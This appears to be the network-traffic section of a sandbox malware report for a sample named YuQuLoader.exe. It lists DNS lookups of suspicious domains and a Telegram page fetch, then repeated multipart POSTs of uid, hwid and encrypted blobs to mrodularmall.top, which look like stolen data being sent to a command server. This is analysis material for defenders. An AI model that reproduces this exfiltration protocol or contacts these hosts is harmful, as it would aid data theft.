                                                                                    Mar 11, 2025 17:23:56.456634998 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.459793091 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.459824085 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.459893942 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.459909916 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.460302114 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.468755960 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.468842030 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.468887091 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.468991995 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.468991995 CET49725443192.168.2.5104.21.112.1
                                                                                    Mar 11, 2025 17:23:56.469007015 CET44349725104.21.112.1192.168.2.5
                                                                                    Mar 11, 2025 17:23:56.469017029 CET44349725104.21.112.1192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 11, 2025 17:23:25.769445896 CET | 62172 | 53 | 192.168.2.5 | 1.1.1.1
Mar 11, 2025 17:23:25.776082039 CET | 53 | 62172 | 1.1.1.1 | 192.168.2.5
Mar 11, 2025 17:23:28.413283110 CET | 57050 | 53 | 192.168.2.5 | 1.1.1.1
Mar 11, 2025 17:23:28.422256947 CET | 53 | 57050 | 1.1.1.1 | 192.168.2.5
Mar 11, 2025 17:23:28.424058914 CET | 53395 | 53 | 192.168.2.5 | 1.1.1.1
Mar 11, 2025 17:23:28.433151007 CET | 53 | 53395 | 1.1.1.1 | 192.168.2.5
Mar 11, 2025 17:23:29.703444004 CET | 57187 | 53 | 192.168.2.5 | 1.1.1.1
Mar 11, 2025 17:23:30.210114002 CET | 53 | 57187 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 11, 2025 17:23:25.769445896 CET | 192.168.2.5 | 1.1.1.1 | 0x6236 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:28.413283110 CET | 192.168.2.5 | 1.1.1.1 | 0xff5b | Standard query (0) | astralconnec.icu | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:28.424058914 CET | 192.168.2.5 | 1.1.1.1 | 0x4f03 | Standard query (0) | featureccus.shop | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:29.703444004 CET | 192.168.2.5 | 1.1.1.1 | 0x901b | Standard query (0) | mrodularmall.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 11, 2025 17:23:25.776082039 CET | 1.1.1.1 | 192.168.2.5 | 0x6236 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:28.422256947 CET | 1.1.1.1 | 192.168.2.5 | 0xff5b | Name error (3) | astralconnec.icu | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:28.433151007 CET | 1.1.1.1 | 192.168.2.5 | 0x4f03 | No error (0) | featureccus.shop | | 104.21.93.43 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:28.433151007 CET | 1.1.1.1 | 192.168.2.5 | 0x4f03 | No error (0) | featureccus.shop | | 172.67.204.104 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:23:30.210114002 CET | 1.1.1.1 | 192.168.2.5 | 0x901b | No error (0) | mrodularmall.top | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
                                                                                    • t.me
                                                                                    • mrodularmall.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 149.154.167.99 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:27 UTC | 61 | OUT | GET /asdawfq HTTP/1.1
Connection: Keep-Alive
Host: t.me
2025-03-11 16:23:28 UTC | 512 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 11 Mar 2025 16:23:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12333
Connection: close
Set-Cookie: stel_ssid=3d938ea1e907c113ce_14650810596568096819; expires=Wed, 12 Mar 2025 16:23:28 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2025-03-11 16:23:28 UTC | 12333 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49714 | 104.21.112.1 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:32 UTC | 265 | OUT | POST /aNzS HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 65
Host: mrodularmall.top
2025-03-11 16:23:32 UTC | 65 | OUT | Data Ascii: uid=71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4&cid=
2025-03-11 16:23:32 UTC | 795 | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 16:23:32 GMT
Content-Type: application/octet-stream
Content-Length: 14134
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CN09br7jttek1XZiAaXlvXKhsYUfdGk%2FGy%2BMjyYNyQ4KbSR%2Fdl2Sr%2B3w%2FQjkNKC5w%2F%2Bj%2F3QroTsFC%2FpvkZqWfyg2daZZe3Kpj90LQSOXGIc55n09Sbqz6pym3h9uTWwi7j%2BH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91ec659afa1f4f77-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=41495&min_rtt=34226&rtt_var=22226&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=966&delivery_rate=44387&cwnd=32&unsent_bytes=0&cid=bbb519fb23cfbc9b&ts=926&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49716 | 104.21.112.1 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:35 UTC | 274 | OUT | POST /aNzS HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=53Oe3gS1M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 14892
Host: mrodularmall.top
2025-03-11 16:23:35 UTC | 14892 | OUT | Data Ascii:
--53Oe3gS1M
Content-Disposition: form-data; name="uid"

71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4
--53Oe3gS1M
Content-Disposition: form-data; name="pid"

2
--53Oe3gS1M
Content-Disposition: form-data; name="hwid"

520F4AF61CB02E19
2025-03-11 16:23:36 UTC | 819 | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 16:23:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjG5wZx%2BWqT1TsT0WBhWS2LksxKBQB0NqUy5fiddQVR%2B5DZcfdx%2BCAYQjp2%2Bx4gKLEvRgc2j13xxuJ%2FZYClCJNojU9LeS9LvuSufxwXtPxXFSYajaCnfmzcd2U52KF4%2Fp3cT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91ec65b1188b423a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=32672&min_rtt=30798&rtt_var=11911&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15824&delivery_rate=74641&cwnd=32&unsent_bytes=0&cid=fed6d38ed2c4f67f&ts=997&x=0"
2025-03-11 16:23:36 UTC | 75 | IN | Data Ascii:
45
{"success":{"message":"message success delivery from 73.148.31.182"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49717 | 104.21.112.14 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:38 UTC | 278 | OUT | POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=FZUWWktq31htF
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15061
    Host: mrodularmall.top
2025-03-11 16:23:38 UTC | 15061 | OUT | Data Raw: 2d 2d 46 5a 55 57 57 6b 74 71 33 31 68 74 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 46 5a 55 57 57 6b 74 71 33 31 68 74 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 5a 55 57 57 6b 74 71 33 31 68 74 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46
    Data Ascii: --FZUWWktq31htFContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--FZUWWktq31htFContent-Disposition: form-data; name="pid"2--FZUWWktq31htFContent-Disposition: form-data; name="hwid"520F
2025-03-11 16:23:39 UTC | 814 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:23:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHusKjYrFX4moLnJiAKkGcwcU1sJ5qOkHU%2F5eLgUbLMk%2Bsj2gr1EKgAO7cmSvCMzUe0EoT%2B8dClIt9kjEn1lHkFLA7THnVgMDdx8k6PiuAQwlvmoit2Blvepfl8HqxLzAu0k"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec65c4d946425f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=42921&min_rtt=31685&rtt_var=16603&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15997&delivery_rate=75607&cwnd=32&unsent_bytes=0&cid=4f146af7002e8f02&ts=1028&x=0"
2025-03-11 16:23:39 UTC | 75 | IN | Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}
2025-03-11 16:23:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49718 | 104.21.112.14 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:41 UTC | 278 | OUT | POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ZljRRr7joE7Lj
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20550
    Host: mrodularmall.top
2025-03-11 16:23:41 UTC | 15331 | OUT | Data Raw: 2d 2d 5a 6c 6a 52 52 72 37 6a 6f 45 37 4c 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 5a 6c 6a 52 52 72 37 6a 6f 45 37 4c 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 6c 6a 52 52 72 37 6a 6f 45 37 4c 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46
    Data Ascii: --ZljRRr7joE7LjContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--ZljRRr7joE7LjContent-Disposition: form-data; name="pid"3--ZljRRr7joE7LjContent-Disposition: form-data; name="hwid"520F
2025-03-11 16:23:41 UTC | 5219 | OUT | Data Raw: e5 b1 d5 d3 fb f4 f5 e0 0b 85 be e0 7d c8 c4 97 39 fa 1d 5a 7e d4 f2 22 ab ef dc 86 3b 76 e6 15 97 b2 c8 5e 24 29 81 6d ec 59 a4 b1 c8 4d 68 12 8a aa 63 bf 8c 9e 3a 76 3f 63 a9 ca 13 3e 52 f8 2b 04 56 f7 05 57 3e be 29 43 6f 92 61 02 28 27 69 68 07 65 b9 56 15 40 10 c5 00 25 de 7a 77 a7 e6 3b bf 43 53 b4 1a a5 47 41 d5 fe 70 32 19 71 f4 bf 15 84 b7 f5 15 4f f9 0e 8e 92 a9 34 39 45 58 27 ea 32 2c e9 9b bf b8 fa 80 14 ed 14 8f ff 6b 8c bb 9d 0a ce c8 7a d4 65 a7 34 e4 eb 2b aa d3 88 b4 d8 2e 70 0b d7 f5 c9 45 13 d6 68 a8 8a 62 ae 9a a8 fa 63 d7 39 56 c3 ef 08 ff 87 39 8b f0 b8 1f 20 16 ea 63 00 70 83 21 ad 50 7e b6 cb d7 04 63 95 ce c4 5f 0f bc f5 c7 d0 86 93 83 b6 0b c8 f7 b1 54 51 11 15 ab cf b4 68 d1 f9 ce 1c 7b 40 3f 2c fb 7b 1e 74 ae c1 ae 9a 03 93 ff
    Data Ascii: }9Z~";v^$)mYMhc:v?c>R+VW>)Coa('iheV@%zw;CSGAp2qO49EX'2,kze4+.pEhbc9V9 cp!P~c_TQh{@?,{t
2025-03-11 16:23:43 UTC | 813 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:23:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlCR6odPL51QJ7xYqA2LuH2SkZztNIimf3Dd10tq4tgvwDszlMEt5vgklqMAQzxTS1KJaqRiwh5KpG%2Bq1mAlFHMyyiVCzRvQB%2BL1wBSo0XZD47zW80ZmcTFoxYG4abrD3MZ1"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec65d8acb707b9-IAD
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=43668&min_rtt=37887&rtt_var=20677&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21508&delivery_rate=46293&cwnd=214&unsent_bytes=0&cid=b31e4c49030e14ba&ts=1245&x=0"
2025-03-11 16:23:43 UTC | 75 | IN | Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}
2025-03-11 16:23:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49721 | 104.21.112.14 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:46 UTC | 272 | OUT | POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=o38L1GPF
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2460
    Host: mrodularmall.top
2025-03-11 16:23:46 UTC | 2460 | OUT | Data Raw: 2d 2d 6f 33 38 4c 31 47 50 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 6f 33 38 4c 31 47 50 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 6f 33 38 4c 31 47 50 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46 34 41 46 36 31 43 42 30 32 45 31 39 33 31 32
    Data Ascii: --o38L1GPFContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--o38L1GPFContent-Disposition: form-data; name="pid"1--o38L1GPFContent-Disposition: form-data; name="hwid"520F4AF61CB02E19312
2025-03-11 16:23:47 UTC | 816 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:23:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zD%2FHbpAiw7oEDRyb0CLVo4mkUluPIH8qg20XgQalkxcFXZ6hPO8lbFBWPaEwqfPoRQIxXHq9Hzq7%2BwtIgBuNOCuQOVhfXaGD0cp7v6kb%2BgoYkCCe8vaZDLapQ3xTD%2F%2FBwhBq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec65f3a90107b5-IAD
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27686&min_rtt=22823&rtt_var=15264&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=3368&delivery_rate=58622&cwnd=222&unsent_bytes=0&cid=5c31231fe09ea56e&ts=1062&x=0"
2025-03-11 16:23:47 UTC | 75 | IN | Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49723 | 104.21.112.14 | 443 | 8668 | C:\Users\user\Desktop\YuQuLoader.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:23:49 UTC | 276 | OUT | POST /aNzS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=yGB1I56Y0N
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 587685
    Host: mrodularmall.top
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 2d 2d 79 47 42 31 49 35 36 59 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 79 47 42 31 49 35 36 59 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 79 47 42 31 49 35 36 59 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46 34 41 46 36 31 43 42 30 32
    Data Ascii: --yGB1I56Y0NContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--yGB1I56Y0NContent-Disposition: form-data; name="pid"1--yGB1I56Y0NContent-Disposition: form-data; name="hwid"520F4AF61CB02
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 41 c8 8a 77 41 85 cd c2 69 2e 44 9e cb 95 66 1c 78 cd c6 c7 7a 2c 5b 64 85 32 3f c3 a2 74 00 4b 4f 38 92 49 5f 01 31 52 03 5a 71 37 3c d1 3c ac 7c 4d e2 04 c1 dd 45 96 d8 18 99 26 e0 60 e8 4a 35 d3 58 88 79 37 4d e2 61 e6 e6 82 08 61 4a e6 b1 f3 0a 1d b8 8f 3d 4e 53 0c bd 96 16 59 e9 4c c6 b5 da 76 5a 55 08 04 c7 de e2 e3 36 cd 25 a1 80 c3 23 af 1f 8e 97 bb 2a 7a 5d 10 97 a7 fe dd 0f 8f ae 03 7e d6 d6 c8 3b ad 4a 96 0a 39 1d 20 af b7 a1 03 46 a7 72 68 05 d1 66 ef 3a 06 45 a5 f7 58 7c ff 25 97 9f 1f e2 c3 51 0d e2 81 e4 cf c8 ff c8 f8 cb 88 3f 76 4d c0 8e 6c 1d e9 85 82 d5 7b 9d 2c a7 13 45 a1 0e c1 81 c9 43 40 5a 05 72 83 56 e2 3d 22 40 cb 4e bd 57 c9 39 74 51 39 bb 40 0f 2e ff 16 70 68 79 f1 34 22 c5 12 1b 59 64 7a c4 67 2f d6 2b f6 2d 74 59 51 8d 01 d6
    Data Ascii: AwAi.Dfxz,[d2?tKO8I_1RZq7<<|ME&`J5Xy7MaaJ=NSYLvZU6%#*z]~;J9 Frhf:EX|%Q?vMl{,EC@ZrV="@NW9tQ9@.phy4"Ydzg/+-tYQ
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 60 2b 2c 03 96 3d 98 c2 b2 40 6f 74 4b 83 45 7d 56 d5 21 30 49 6d d7 2f b0 dd f6 b9 db fc f5 79 d5 2b b0 41 21 35 ae ef 80 49 42 b3 e6 6d 51 51 7b 01 5e 96 f2 f2 99 5a 75 07 7a d0 c0 5a 56 36 eb e0 ff ad 1b 4d 97 1b e5 bb a0 c1 3c 63 c2 48 96 f0 0e fc 28 43 a6 9b 71 21 db c4 bb 02 4d 2e b5 14 c5 25 3e 16 78 a0 1c 2c 9b 30 9f 21 dd d8 ae 6c a9 30 0d c0 98 d7 cb 5d 56 da 96 b1 0a ad 85 d7 d0 e8 5b dc 02 53 46 68 75 99 07 4f 10 e3 f2 48 9c a8 2a 4d e1 aa ee d0 f3 1e 84 30 c0 2c d8 13 db f5 52 e6 31 e1 8d 11 8b 86 c2 44 8d a3 16 93 58 a3 1b 5c df 97 2d 88 17 f3 31 dc ab 7a 34 cb bb fd 18 1f e5 82 89 4d 0d 8f 8e 4a 24 17 4f 7e 5f 7c 10 15 03 03 98 e7 c7 b4 0f 83 af 91 e2 55 fc 81 54 5d 6f 2d e5 21 07 a2 b3 dc 01 e3 e5 b0 42 27 35 11 52 7b fb 5f 13 fd 7a 22 98
    Data Ascii: `+,=@otKE}V!0Im/y+A!5IBmQQ{^ZuzZV6M<cH(Cq!M.%>x,0!l0]V[SFhuOH*M0,R1DX\-1z4MJ$O~_|UT]o-!B'5R{_z"
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: fa d8 21 6c 72 36 c6 9d 9c 8b 1b 48 64 f4 e4 2d 46 bb 4f c0 db 69 b5 82 52 c0 91 91 21 24 10 dd ae 07 b5 cb 78 51 3b 2e 07 0a b6 42 29 dd 99 ab 70 51 4e 17 9d 94 51 5b 9c 27 83 c6 34 80 c6 1e 14 74 81 6f 73 5c ae 85 01 76 89 de 68 43 16 98 6e 5e c6 86 30 69 c9 4b 03 02 55 be cd 70 7b 4c 73 a4 3c 66 42 85 38 77 a8 bf 8d ec fc 3a c9 30 10 1c 25 fb 34 2e 3b 10 b5 0a 79 46 6e 00 6d ef 0c 01 32 fc 59 05 a9 5a e5 13 b5 66 c5 11 8e da 66 e5 87 b2 25 15 47 39 cc b8 e1 57 a8 4f 8d 65 d4 4b 45 70 63 e7 ff ab dc 33 3f a2 10 e5 af 7c 19 37 f9 ce 32 9d 14 25 82 d6 13 6b 14 3b b2 a2 56 34 1a 0f f5 34 f1 ff 32 65 07 e9 cf 9e 44 33 96 ab 64 1c f1 6e 6c a0 cc 08 1d 2b c3 20 a6 ab 33 78 9c a1 dd 89 2b 62 69 d6 09 b4 2a 07 d3 1b 9f e2 c5 51 88 28 7d 4f b2 4e a7 92 30 96 50
    Data Ascii: !lr6Hd-FOiR!$xQ;.B)pQNQ['4tos\vhCn^0iKUp{Ls<fB8w:0%4.;yFnm2YZff%G9WOeKEpc3?|72%k;V442eD3dnl+ 3x+bi*Q(}ON0P
